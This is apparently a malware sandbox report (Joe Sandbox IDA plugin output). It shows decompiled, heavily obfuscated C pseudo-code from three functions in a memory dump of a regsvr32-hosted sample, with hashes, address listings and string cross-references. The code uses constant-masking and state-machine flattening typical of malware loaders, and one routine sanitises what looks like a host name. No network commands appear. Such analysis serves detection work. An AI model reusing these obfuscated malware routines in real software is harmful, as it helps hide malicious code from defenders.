				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				void* _t364;
				void* _t367;
				void* _t375;
				void* _t379;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				intOrPtr _t420;
				intOrPtr* _t425;
				void* _t429;
				signed int* _t430;

				_t430 =  &_v164;
				_v44 = 0xc56d85;
				_v44 = _v44 | 0x6747c0a0;
				_v44 = _v44 ^ 0x67c7eda5;
				_v148 = 0xd0221b;
				_v148 = _v148 + 0xb86b;
				_t425 = __ecx;
				_t429 = 0;
				_t382 = 0x2d;
				_v4 = __ecx;
				_t379 = 0x771143;
				_v148 = _v148 / _t382;
				_v148 = _v148 * 0x66;
				_v148 = _v148 ^ 0x01d966be;
				_v152 = 0x268288;
				_v152 = _v152 + 0xc42a;
				_v152 = _v152 * 0x1a;
				_v152 = _v152 | 0x9e13f09a;
				_v152 = _v152 ^ 0x9ffffe9e;
				_v84 = 0x856365;
				_v84 = _v84 + 0xffff26a7;
				_v84 = _v84 << 4;
				_v84 = _v84 ^ 0x0848a0c0;
				_v72 = 0xf332ed;
				_v72 = _v72 ^ 0xef6a6dd6;
				_v72 = _v72 >> 6;
				_v72 = _v72 ^ 0x03be657c;
				_v120 = 0xd51e66;
				_v120 = _v120 | 0x823b6191;
				_v120 = _v120 + 0xffffb8fb;
				_v120 = _v120 + 0xaa7;
				_v120 = _v120 ^ 0x82fd9684;
				_v108 = 0xd10da2;
				_v108 = _v108 + 0xffff1c26;
				_v108 = _v108 + 0xffff12ce;
				_v108 = _v108 ^ 0x00cc3eec;
				_v76 = 0x14aa13;
				_v76 = _v76 ^ 0xa7d92c4a;
				_v76 = _v76 >> 0xc;
				_v76 = _v76 ^ 0x000074b4;
				_v92 = 0x17a820;
				_v92 = _v92 ^ 0x3a93bf92;
				_v92 = _v92 | 0x1a458659;
				_v92 = _v92 ^ 0x3acb9ffe;
				_v144 = 0x9f1ca1;
				_v144 = _v144 << 3;
				_v144 = _v144 | 0x88246970;
				_v144 = _v144 + 0x8e62;
				_v144 = _v144 ^ 0x8cf667c6;
				_v52 = 0x8da33b;
				_v52 = _v52 >> 8;
				_v52 = _v52 ^ 0x00059428;
				_v96 = 0x1abb08;
				_v96 = _v96 ^ 0x6c742edf;
				_v96 = _v96 + 0xffff01f6;
				_v96 = _v96 ^ 0x6c6614ef;
				_v112 = 0x9f0f81;
				_v112 = _v112 * 0x6a;
				_v112 = _v112 >> 3;
				_v112 = _v112 ^ 0x083a0fed;
				_v156 = 0x609a24;
				_v156 = _v156 + 0xffff683f;
				_v156 = _v156 << 5;
				_v156 = _v156 + 0xcd31;
				_v156 = _v156 ^ 0x0c079756;
				_v164 = 0xe5cc1d;
				_v164 = _v164 << 7;
				_v164 = _v164 | 0x9a492847;
				_v164 = _v164 * 0x78;
				_v164 = _v164 ^ 0xa012b17f;
				_v128 = 0x53ee3c;
				_t120 =  &_v128; // 0x53ee3c
				_t383 = 0x29;
				_v128 =  *_t120 / _t383;
				_v128 = _v128 ^ 0x929088a5;
				_v128 = _v128 + 0xa7c3;
				_v128 = _v128 ^ 0x929242c1;
				_v140 = 0x5f30f1;
				_v140 = _v140 | 0xd1491927;
				_t384 = 0x7c;
				_v140 = _v140 / _t384;
				_t385 = 0x58;
				_v140 = _v140 / _t385;
				_v140 = _v140 ^ 0x000295f0;
				_v88 = 0x55e174;
				_v88 = _v88 ^ 0x7dd6f036;
				_v88 = _v88 >> 0xd;
				_v88 = _v88 ^ 0x000a8d63;
				_v28 = 0xb452eb;
				_v28 = _v28 + 0xffff5322;
				_v28 = _v28 ^ 0x00ba2bf5;
				_v36 = 0x42507a;
				_v36 = _v36 | 0xf1dc1e20;
				_v36 = _v36 ^ 0xf1d9c77b;
				_v80 = 0xc31b4e;
				_v80 = _v80 ^ 0xd2ac5232;
				_t386 = 0x43;
				_v80 = _v80 / _t386;
				_v80 = _v80 ^ 0x03298e6e;
				_v124 = 0x46c8cc;
				_v124 = _v124 << 8;
				_v124 = _v124 >> 5;
				_v124 = _v124 << 7;
				_v124 = _v124 ^ 0x1b2fd4b6;
				_v132 = 0x745205;
				_v132 = _v132 ^ 0x1862e0ae;
				_v132 = _v132 << 5;
				_v132 = _v132 >> 6;
				_v132 = _v132 ^ 0x0007d289;
				_v20 = 0x713f0f;
				_v20 = _v20 ^ 0x61c76558;
				_v20 = _v20 ^ 0x61bb476a;
				_v48 = 0x3998c0;
				_v48 = _v48 | 0xd3555304;
				_v48 = _v48 ^ 0xd37b9815;
				_v160 = 0xe5ad6c;
				_v160 = _v160 * 0x3a;
				_v160 = _v160 | 0x660736ab;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0xefd0e6e0;
				_v60 = 0x9fc9f5;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x000a96ad;
				_v16 = 0xa888b5;
				_v16 = _v16 << 0xb;
				_v16 = _v16 ^ 0x4445c6cc;
				_v104 = 0xee35af;
				_v104 = _v104 ^ 0xea83652e;
				_v104 = _v104 << 3;
				_v104 = _v104 ^ 0x536d6a1f;
				_v12 = 0x6066b2;
				_v12 = _v12 + 0xb1d6;
				_v12 = _v12 ^ 0x00605003;
				_v40 = 0x2dba20;
				_v40 = _v40 * 0x73;
				_v40 = _v40 ^ 0x1485b41c;
				_v136 = 0xfcb12d;
				_v136 = _v136 << 1;
				_v136 = _v136 + 0xaead;
				_v136 = _v136 + 0xffffaecb;
				_v136 = _v136 ^ 0x01ffed69;
				_v24 = 0x751c6a;
				_t387 = 0x7d;
				_v24 = _v24 / _t387;
				_v24 = _v24 ^ 0x0002b143;
				_v68 = 0x69a6e2;
				_v68 = _v68 + 0xaa03;
				_v68 = _v68 ^ 0x73662bb1;
				_v68 = _v68 ^ 0x730f0150;
				_v100 = 0xcb496d;
				_v100 = _v100 >> 1;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x0008f604;
				_v56 = 0x2cd04e;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0x0162f7e8;
				_v32 = 0xb2ca4d;
				_v32 = _v32 + 0x32b9;
				_v32 = _v32 ^ 0x00b4bcfb;
				_v64 = 0x655992;
				_v64 = _v64 >> 5;
				_v64 = _v64 | 0x6342cf71;
				_v64 = _v64 ^ 0x634627b6;
				_v116 = 0x833545;
				_v116 = _v116 * 0x75;
				_v116 = _v116 + 0xeb9e;
				_v116 = _v116 * 0x6f;
				_v116 = _v116 ^ 0x00ae15cd;
				while(1) {
					L1:
					_t364 = 0x917a7c8;
					do {
						if(_t379 == 0x771143) {
							_t379 = 0x6e440a7;
							goto L9;
						} else {
							if(_t379 == 0x1a710aa) {
								E04B3F7FE(_v64, _v8, _v116, _v72);
							} else {
								if(_t379 == 0x6e440a7) {
									_push(_v92);
									_push(_v76);
									_push(_v108);
									_t367 = E04B4E1F8(0x4b314c8, _v120, __eflags);
									_push(_v112);
									_push(_v96);
									_push(_v52);
									__eflags = L04B3738A(_v156, _t367, _v164, _v44,  &_v8, E04B4E1F8(0x4b31318, _v144, __eflags), _v128) - _v148;
									_t379 =  ==  ? 0x917a7c8 : 0x14ee4a5;
									E04B4FECB(_t367, _v140, _v88, _v28, _v36);
									E04B4FECB(_t368, _v80, _v124, _v132, _v20);
									_t425 = _v4;
									_t430 =  &(_t430[0x11]);
									_t364 = 0x917a7c8;
									goto L9;
								} else {
									_t436 = _t379 - _t364;
									if(_t379 != _t364) {
										goto L9;
									} else {
										_push(_v16);
										_push(_v60);
										_push(_v160);
										_t375 = E04B4E1F8(0x4b31368, _v48, _t436);
										_t420 =  *0x4b56224; // 0x0
										E04B3BC32( *((intOrPtr*)(_t425 + 4)), _t420 + 0x48, _v152, _v104, _v12, _t375,  *_t425, _v40, _v136, _v8, 0x4b31368, _v24);
										_t379 = 0x1a710aa;
										_t429 =  ==  ? 1 : _t429;
										E04B4FECB(_t375, _v68, _v100, _v56, _v32);
										_t430 =  &(_t430[0x10]);
										goto L1;
									}
								}
							}
						}
						L12:
						return _t429;
						L9:
						__eflags = _t379 - 0x14ee4a5;
					} while (__eflags != 0);
					goto L12;
				}
			}

0x04b48fae
0x04b48fb4
0x04b48fbe
0x04b48fc6
0x04b48fce
0x04b48fd6
0x04b48fe6
0x04b48fe8
0x04b48fec
0x04b48fef
0x04b48ff6
0x04b48ffb
0x04b49004
0x04b49008
0x04b49010
0x04b49018
0x04b49025
0x04b49029
0x04b49031
0x04b49039
0x04b49041
0x04b49049
0x04b4904e
0x04b49056
0x04b4905e
0x04b49066
0x04b4906b
0x04b49073
0x04b4907b
0x04b49083
0x04b4908b
0x04b49093
0x04b4909b
0x04b490a3
0x04b490ab
0x04b490b3
0x04b490bb
0x04b490c3
0x04b490cb
0x04b490d0
0x04b490d8
0x04b490e0
0x04b490e8
0x04b490f0
0x04b490f8
0x04b49100
0x04b49105
0x04b4910d
0x04b49115
0x04b4911d
0x04b49128
0x04b49130
0x04b4913b
0x04b49143
0x04b4914b
0x04b49153
0x04b4915b
0x04b49168
0x04b4916c
0x04b49171
0x04b49179
0x04b49181
0x04b49189
0x04b4918e
0x04b49196
0x04b4919e
0x04b491a6
0x04b491ab
0x04b491b8
0x04b491bc
0x04b491c4
0x04b491ce
0x04b491d4
0x04b491d9
0x04b491df
0x04b491e7
0x04b491ef
0x04b491f7
0x04b491ff
0x04b4920b
0x04b49210
0x04b4921a
0x04b4921f
0x04b49225
0x04b4922d
0x04b49235
0x04b4923d
0x04b49242
0x04b4924a
0x04b49255
0x04b49260
0x04b4926b
0x04b49276
0x04b49281
0x04b4928c
0x04b49294
0x04b492a0
0x04b492a3
0x04b492a7
0x04b492af
0x04b492b7
0x04b492bc
0x04b492c1
0x04b492c6
0x04b492ce
0x04b492d6
0x04b492de
0x04b492e3
0x04b492e8
0x04b492f0
0x04b492fb
0x04b49306
0x04b49311
0x04b4931c
0x04b49327
0x04b49332
0x04b4933f
0x04b49343
0x04b4934b
0x04b49350
0x04b49358
0x04b49360
0x04b49365
0x04b4936d
0x04b49378
0x04b49380
0x04b4938b
0x04b49393
0x04b4939b
0x04b493a0
0x04b493a8
0x04b493b3
0x04b493be
0x04b493c9
0x04b493dc
0x04b493e5
0x04b493f0
0x04b493f8
0x04b493fc
0x04b49404
0x04b4940c
0x04b49414
0x04b49428
0x04b4942b
0x04b49432
0x04b4943d
0x04b49445
0x04b4944d
0x04b49455
0x04b4945d
0x04b49465
0x04b49469
0x04b4946e
0x04b49476
0x04b4947e
0x04b49483
0x04b4948b
0x04b49496
0x04b494a1
0x04b494ac
0x04b494b4
0x04b494b9
0x04b494c1
0x04b494c9
0x04b494d6
0x04b494da
0x04b494e7
0x04b494eb
0x04b494f3
0x04b494f3
0x04b494f3
0x04b494f8
0x04b494fe
0x04b49688
0x00000000
0x04b49504
0x04b4950a
0x04b496ae
0x04b49510
0x04b49516
0x04b495c7
0x04b495d0
0x04b495d4
0x04b495dc
0x04b495e1
0x04b495ec
0x04b495f0
0x04b49630
0x04b49647
0x04b49655
0x04b49672
0x04b49677
0x04b4967e
0x04b49681
0x00000000
0x04b4951c
0x04b4951c
0x04b4951e
0x00000000
0x04b49524
0x04b49524
0x04b49530
0x04b49534
0x04b4953f
0x04b49575
0x04b49581
0x04b4959b
0x04b495a7
0x04b495ba
0x04b495bf
0x00000000
0x04b495bf
0x04b4951e
0x04b49516
0x04b4950a
0x04b496b7
0x04b496c1
0x04b4968d
0x04b4968d
0x04b4968d
0x00000000
0x04b49699

Strings

zPB, xrefs: 04B4926B
tU, xrefs: 04B4922D
<S, xrefs: 04B491CE

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: <S$tU$zPB
API String ID: 0-3909742637
Opcode ID: 20a553232f284bd504da57e83ae33edc3d80d96ca56f2f718af2e5c1ad7d7496
Instruction ID: e75b0b7dcb737088778132ae08985313c9836ad52da8238933f904f8e371a2af
Opcode Fuzzy Hash: 20a553232f284bd504da57e83ae33edc3d80d96ca56f2f718af2e5c1ad7d7496
Instruction Fuzzy Hash: F4F10F715083809FE768CF25C58AA4BFBF2FBC5748F50891DE5AA96260D7B18909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B49DF5, Relevance: 4.0, Strings: 3, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E04B49DF5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				unsigned int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t196;
				void* _t219;
				char _t222;
				void* _t227;
				char* _t235;
				void* _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int* _t272;

				_push(_a12);
				_t259 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04B4FE29(_t196);
				_v164 = 0xe41f8c;
				_t272 =  &(( &_v208)[5]);
				_v164 = _v164 << 0x10;
				_t227 = 0xb5c0777;
				_t260 = 0x69;
				_v164 = _v164 * 0x11;
				_v164 = _v164 ^ 0x18467706;
				_v180 = 0xeb334b;
				_v180 = _v180 ^ 0xb42ec71e;
				_v180 = _v180 << 0xf;
				_v180 = _v180 ^ 0xfa2f170d;
				_v204 = 0x9173d0;
				_v204 = _v204 / _t260;
				_v204 = _v204 + 0xc6b3;
				_t261 = 0x22;
				_v204 = _v204 / _t261;
				_v204 = _v204 ^ 0x000ee5cc;
				_v176 = 0x7c8d5;
				_v176 = _v176 | 0x723fe192;
				_v176 = _v176 + 0x4897;
				_v176 = _v176 ^ 0x724c9210;
				_v184 = 0xa283a5;
				_v184 = _v184 >> 0xd;
				_v184 = _v184 >> 9;
				_v184 = _v184 ^ 0x00039d39;
				_v172 = 0xfcf8f5;
				_t262 = 0x68;
				_v172 = _v172 / _t262;
				_t263 = 0x12;
				_v172 = _v172 / _t263;
				_v172 = _v172 ^ 0x0008ec4c;
				_v196 = 0x6ce5d4;
				_v196 = _v196 + 0x3b25;
				_v196 = _v196 ^ 0x77f3da3b;
				_v196 = _v196 + 0xa9d5;
				_v196 = _v196 ^ 0x779af0ad;
				_v156 = 0x25f26f;
				_t264 = 0x4f;
				_v156 = _v156 / _t264;
				_v156 = _v156 ^ 0x000ca3cb;
				_v188 = 0x55ff28;
				_t265 = 7;
				_v188 = _v188 / _t265;
				_t266 = 0x50;
				_v188 = _v188 / _t266;
				_v188 = _v188 ^ 0x000cd773;
				_v148 = 0x9faf35;
				_v148 = _v148 >> 0xb;
				_v148 = _v148 ^ 0x00041a0d;
				_v144 = 0xb9aa79;
				_v144 = _v144 + 0xffff300b;
				_v144 = _v144 ^ 0x00b65e72;
				_v152 = 0xe2e022;
				_v152 = _v152 << 0xa;
				_v152 = _v152 ^ 0x8b87efd2;
				_v140 = 0x6f845f;
				_v140 = _v140 ^ 0xc6ebfb93;
				_v140 = _v140 ^ 0xc684fc76;
				_v208 = 0x15bd2c;
				_v208 = _v208 + 0xca24;
				_v208 = _v208 + 0xaf45;
				_v208 = _v208 >> 5;
				_v208 = _v208 ^ 0x000727e8;
				_v136 = 0x982476;
				_v136 = _v136 | 0xd92aa943;
				_v136 = _v136 ^ 0xd9b01548;
				_v160 = 0x20104f;
				_v160 = _v160 ^ 0xef20d220;
				_t267 = 0x2e;
				_v160 = _v160 * 0x21;
				_v160 = _v160 ^ 0xcf1410de;
				_v168 = 0x2e9b6b;
				_v168 = _v168 + 0xffff5c1c;
				_v168 = _v168 * 0x26;
				_v168 = _v168 ^ 0x06dc91dd;
				_v192 = 0xd01025;
				_v192 = _v192 | 0x8f03462b;
				_v192 = _v192 + 0xffffdaa2;
				_v192 = _v192 << 2;
				_v192 = _v192 ^ 0x3f4450ba;
				_v200 = 0xfd9656;
				_v200 = _v200 | 0x00ba0155;
				_v200 = _v200 / _t267;
				_t268 = 0x6a;
				_v200 = _v200 / _t268;
				_v200 = _v200 ^ 0x00073cbf;
				while(_t227 != 0x9fc41a2) {
					if(_t227 == 0xa1171ea) {
						_v132 = 0x80;
						_t222 = E04B496C2(_v164, _v180, _v204, _v176,  &_v128,  &_v132);
						_t272 =  &(_t272[4]);
						_t227 = 0xabd7dae;
						continue;
					} else {
						if(_t227 == 0xabd7dae) {
							__eflags = _v128;
							_t235 =  &_v128;
							while(__eflags != 0) {
								_t222 =  *_t235;
								__eflags = _t222 - 0x30;
								if(_t222 < 0x30) {
									L9:
									__eflags = _t222 - 0x61;
									if(_t222 < 0x61) {
										L11:
										__eflags = _t222 - 0x41;
										if(_t222 < 0x41) {
											L13:
											 *_t235 = 0x58;
										} else {
											__eflags = _t222 - 0x5a;
											if(_t222 > 0x5a) {
												goto L13;
											}
										}
									} else {
										__eflags = _t222 - 0x7a;
										if(_t222 > 0x7a) {
											goto L11;
										}
									}
								} else {
									__eflags = _t222 - 0x39;
									if(_t222 > 0x39) {
										goto L9;
									}
								}
								_t235 = _t235 + 1;
								__eflags =  *_t235;
							}
							_t227 = 0x9fc41a2;
							continue;
						} else {
							if(_t227 == 0xb5c0777) {
								_t227 = 0xa1171ea;
								continue;
							}
						}
					}
					L18:
					__eflags = _t227 - 0x108096a;
					if(__eflags != 0) {
						continue;
					}
					return _t222;
				}
				_push(_v156);
				_push(_v196);
				_push(0x4b3119c);
				_t219 = L04B44244(_v184, _v172, __eflags);
				L04B50A1A(E04B45515(__eflags), __eflags, _t219, _v152,  &_v128, _v188, _t259, _v140, _v208, _v136);
				_t222 = E04B4FECB(_t219, _v160, _v168, _v192, _v200);
				_t272 =  &(_t272[0xe]);
				_t227 = 0x108096a;
				goto L18;
			}

0x04b49dff
0x04b49e06
0x04b49e08
0x04b49e0f
0x04b49e16
0x04b49e17
0x04b49e18
0x04b49e1d
0x04b49e25
0x04b49e28
0x04b49e34
0x04b49e3b
0x04b49e3e
0x04b49e42
0x04b49e4a
0x04b49e52
0x04b49e5a
0x04b49e5f
0x04b49e67
0x04b49e77
0x04b49e7b
0x04b49e87
0x04b49e8c
0x04b49e92
0x04b49e9a
0x04b49ea2
0x04b49eaa
0x04b49eb2
0x04b49eba
0x04b49ec2
0x04b49ec7
0x04b49ecc
0x04b49ed4
0x04b49ee0
0x04b49ee5
0x04b49eef
0x04b49ef4
0x04b49efa
0x04b49f02
0x04b49f0a
0x04b49f12
0x04b49f1a
0x04b49f22
0x04b49f2a
0x04b49f36
0x04b49f3b
0x04b49f41
0x04b49f49
0x04b49f55
0x04b49f5a
0x04b49f64
0x04b49f69
0x04b49f6f
0x04b49f7c
0x04b49f89
0x04b49f8e
0x04b49f96
0x04b49f9e
0x04b49fa6
0x04b49fae
0x04b49fb6
0x04b49fbb
0x04b49fc3
0x04b49fcb
0x04b49fd3
0x04b49fdb
0x04b49fe3
0x04b49feb
0x04b49ff3
0x04b49ff8
0x04b4a000
0x04b4a008
0x04b4a010
0x04b4a018
0x04b4a020
0x04b4a02d
0x04b4a030
0x04b4a034
0x04b4a03c
0x04b4a044
0x04b4a051
0x04b4a055
0x04b4a05d
0x04b4a065
0x04b4a06d
0x04b4a075
0x04b4a07a
0x04b4a082
0x04b4a08a
0x04b4a09a
0x04b4a0a2
0x04b4a0a5
0x04b4a0a9
0x04b4a0b1
0x04b4a0bb
0x04b4a10b
0x04b4a129
0x04b4a12e
0x04b4a131
0x00000000
0x04b4a0bd
0x04b4a0c3
0x04b4a0d5
0x04b4a0da
0x04b4a0de
0x04b4a0e0
0x04b4a0e2
0x04b4a0e4
0x04b4a0ea
0x04b4a0ea
0x04b4a0ec
0x04b4a0f2
0x04b4a0f2
0x04b4a0f4
0x04b4a0fa
0x04b4a0fa
0x04b4a0f6
0x04b4a0f6
0x04b4a0f8
0x00000000
0x00000000
0x04b4a0f8
0x04b4a0ee
0x04b4a0ee
0x04b4a0f0
0x00000000
0x00000000
0x04b4a0f0
0x04b4a0e6
0x04b4a0e6
0x04b4a0e8
0x00000000
0x00000000
0x04b4a0e8
0x04b4a0fd
0x04b4a0fe
0x04b4a0fe
0x04b4a103
0x00000000
0x04b4a0c5
0x04b4a0cb
0x04b4a0d1
0x00000000
0x04b4a0d1
0x04b4a0cb
0x04b4a0c3
0x04b4a1a9
0x04b4a1a9
0x04b4a1af
0x00000000
0x00000000
0x04b4a1bf
0x04b4a1bf
0x04b4a13b
0x04b4a13f
0x04b4a14b
0x04b4a150
0x04b4a185
0x04b4a19c
0x04b4a1a1
0x04b4a1a4
0x00000000

Strings

%;, xrefs: 04B49F0A
K3, xrefs: 04B49E4A
", xrefs: 04B49FAE

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "$%;$K3
API String ID: 0-3594330084
Opcode ID: 5337fe0d12995e4da6b5220c6929894530508f94f5d94763254ea7ad82852740
Instruction ID: 2d5387de4c56949133939943a208a20542b9d11904866f5f42607ad887083701
Opcode Fuzzy Hash: 5337fe0d12995e4da6b5220c6929894530508f94f5d94763254ea7ad82852740
Instruction Fuzzy Hash: 7DA182721083809FD358DF66C989A5FBBE2FBC9758F00895DF1869A220D3B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B3A445, Relevance: 4.0, Strings: 3, Instructions: 213
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E04B3A445() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _t198;
				signed int _t201;
				signed int _t203;
				void* _t206;
				void* _t220;
				void* _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				intOrPtr _t229;
				intOrPtr* _t230;
				signed int _t231;
				signed int* _t232;

				_t232 =  &_v84;
				_v16 = 0x845726;
				_v16 = _v16 << 7;
				_t206 = 0xba97f4f;
				_v16 = _v16 ^ 0x422a9300;
				_v76 = 0xf633ca;
				_v76 = _v76 + 0xffff7f31;
				_v76 = _v76 << 6;
				_v76 = _v76 | 0x2929f239;
				_v76 = _v76 ^ 0x3d62fec6;
				_v20 = 0xcffe1c;
				_v20 = _v20 ^ 0x03d09261;
				_v20 = _v20 ^ 0x03162068;
				_v24 = 0xa4ea56;
				_v24 = _v24 + 0xffff4c41;
				_v24 = _v24 ^ 0x00afa4b9;
				_v40 = 0x50bd11;
				_v40 = _v40 + 0xffffa7ab;
				_v40 = _v40 * 0x3f;
				_t225 = 0;
				_v40 = _v40 ^ 0x13cebba3;
				_v60 = 0x50c08b;
				_v60 = _v60 ^ 0xc2cf2608;
				_v60 = _v60 << 4;
				_t226 = 0x56;
				_v60 = _v60 / _t226;
				_v60 = _v60 ^ 0x0073141c;
				_v64 = 0xa37df4;
				_v64 = _v64 + 0xffffdd88;
				_v64 = _v64 + 0xe629;
				_v64 = _v64 << 3;
				_v64 = _v64 ^ 0x0527d1d9;
				_v68 = 0x27b9fb;
				_t227 = 0x58;
				_v68 = _v68 / _t227;
				_v68 = _v68 * 0x63;
				_v68 = _v68 * 0x3d;
				_v68 = _v68 ^ 0x0aa4ff90;
				_v72 = 0x604a05;
				_v72 = _v72 | 0x3301bbe0;
				_v72 = _v72 + 0xf4ce;
				_v72 = _v72 + 0xffff6149;
				_v72 = _v72 ^ 0x336b10da;
				_v52 = 0x457d04;
				_v52 = _v52 * 0x45;
				_v52 = _v52 | 0xd82309ca;
				_v52 = _v52 + 0xff64;
				_v52 = _v52 ^ 0xdab2f2cc;
				_v8 = 0x71eccb;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000a626b;
				_v12 = 0x94a0c6;
				_v12 = _v12 + 0xffffb2fd;
				_v12 = _v12 ^ 0x009145d9;
				_v56 = 0xdce517;
				_v56 = _v56 >> 1;
				_v56 = _v56 | 0xebc149ed;
				_v56 = _v56 + 0xffff7372;
				_v56 = _v56 ^ 0xebe5f8bb;
				_v44 = 0x6f3a42;
				_v44 = _v44 ^ 0x930a70ca;
				_v44 = _v44 ^ 0x072310e6;
				_v44 = _v44 ^ 0x944572d0;
				_v28 = 0xde598c;
				_v28 = _v28 + 0xffffb8ee;
				_v28 = _v28 ^ 0x00dc27c3;
				_v80 = 0x428d3e;
				_v80 = _v80 * 0x44;
				_v80 = _v80 + 0x7fb1;
				_v80 = _v80 ^ 0x009e7bae;
				_v80 = _v80 ^ 0x11330260;
				_v84 = 0x321edf;
				_v84 = _v84 | 0x009a6787;
				_v84 = _v84 ^ 0xc86f44a5;
				_v84 = _v84 ^ 0xbb12ab62;
				_v84 = _v84 ^ 0x73cf70d9;
				_v48 = 0x740eb7;
				_v48 = _v48 * 0x2b;
				_v48 = _v48 * 0x4f;
				_v48 = _v48 + 0xb6e6;
				_v48 = _v48 ^ 0x040daff3;
				_v32 = 0x3035f0;
				_v32 = _v32 ^ 0xe5f6800a;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0xcb8c371c;
				_v36 = 0xd97c9c;
				_v36 = _v36 >> 3;
				_v36 = _v36 * 0x24;
				_v36 = _v36 ^ 0x03d4918e;
				_v4 = 0x2cfea0;
				_v4 = _v4 ^ 0xf57e16a0;
				_v4 = _v4 ^ 0xf550cd22;
				_t205 = _v4;
				_t231 = _v4;
				_t228 = _v4;
				while(1) {
					L1:
					_push(0x5c);
					while(1) {
						L2:
						_t198 = 0xd71e2f;
						do {
							L3:
							while(_t206 != _t198) {
								if(_t206 == 0x1e5f8bf) {
									_t201 = E04B3EE62(_v60, _t205, _v64, _v68, _v72, _v16, _t228);
									_t232 =  &(_t232[5]);
									_t231 = _t201;
									_t198 = 0xd71e2f;
									_t206 =  !=  ? 0xd71e2f : 0x6f129a6;
									_t220 = 0x5c;
									continue;
								} else {
									if(_t206 == 0x6f129a6) {
										E04B33046(_v48, _v32, _v36, _t205, _v4);
									} else {
										if(_t206 == 0x960e40f) {
											_t203 = E04B4E8B6(_t206, _v20, _v24, _t206, _v76, _v40);
											_t205 = _t203;
											_t232 =  &(_t232[4]);
											if(_t203 != 0) {
												_t206 = 0x1e5f8bf;
												goto L1;
											}
										} else {
											if(_t206 == 0xba97f4f) {
												_t206 = 0xbab8332;
												continue;
											} else {
												if(_t206 == 0xbab8332) {
													_t229 =  *0x4b56214; // 0x0
													_t230 = _t229 + 0x23c;
													while( *_t230 != _t220) {
														_t230 = _t230 + 2;
													}
													_t228 = _t230 + 2;
													_t206 = 0x960e40f;
													goto L2;
												} else {
													if(_t206 != 0xe557a67) {
														goto L20;
													} else {
														E04B33046(_v44, _v28, _v80, _t231, _v84);
														_t232 =  &(_t232[3]);
														_t206 = 0x6f129a6;
														while(1) {
															L1:
															_push(0x5c);
															L2:
															_t198 = 0xd71e2f;
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								L23:
								return _t225;
							}
							E04B31E9B(_v52, _t231, _v8, _v12, _v56);
							_t232 =  &(_t232[3]);
							_t198 = 0xd71e2f;
							_t225 =  !=  ? 1 : _t225;
							_t206 = 0xe557a67;
							_t220 = 0x5c;
							L20:
						} while (_t206 != 0x6b89e3f);
						goto L23;
					}
				}
			}

0x04b3a445
0x04b3a448
0x04b3a452
0x04b3a457
0x04b3a45c
0x04b3a464
0x04b3a46c
0x04b3a474
0x04b3a479
0x04b3a481
0x04b3a489
0x04b3a491
0x04b3a499
0x04b3a4a1
0x04b3a4a9
0x04b3a4b1
0x04b3a4b9
0x04b3a4c1
0x04b3a4d2
0x04b3a4d6
0x04b3a4d8
0x04b3a4e0
0x04b3a4e8
0x04b3a4f0
0x04b3a4fb
0x04b3a500
0x04b3a506
0x04b3a50e
0x04b3a516
0x04b3a51e
0x04b3a526
0x04b3a52b
0x04b3a533
0x04b3a53f
0x04b3a542
0x04b3a54b
0x04b3a554
0x04b3a558
0x04b3a560
0x04b3a568
0x04b3a570
0x04b3a578
0x04b3a580
0x04b3a588
0x04b3a595
0x04b3a599
0x04b3a5a1
0x04b3a5a9
0x04b3a5b1
0x04b3a5b9
0x04b3a5be
0x04b3a5c6
0x04b3a5ce
0x04b3a5d6
0x04b3a5de
0x04b3a5e6
0x04b3a5ea
0x04b3a5f2
0x04b3a5fa
0x04b3a602
0x04b3a60a
0x04b3a612
0x04b3a61a
0x04b3a622
0x04b3a62a
0x04b3a632
0x04b3a63a
0x04b3a647
0x04b3a64b
0x04b3a653
0x04b3a65b
0x04b3a663
0x04b3a66b
0x04b3a673
0x04b3a67b
0x04b3a683
0x04b3a68b
0x04b3a698
0x04b3a6a1
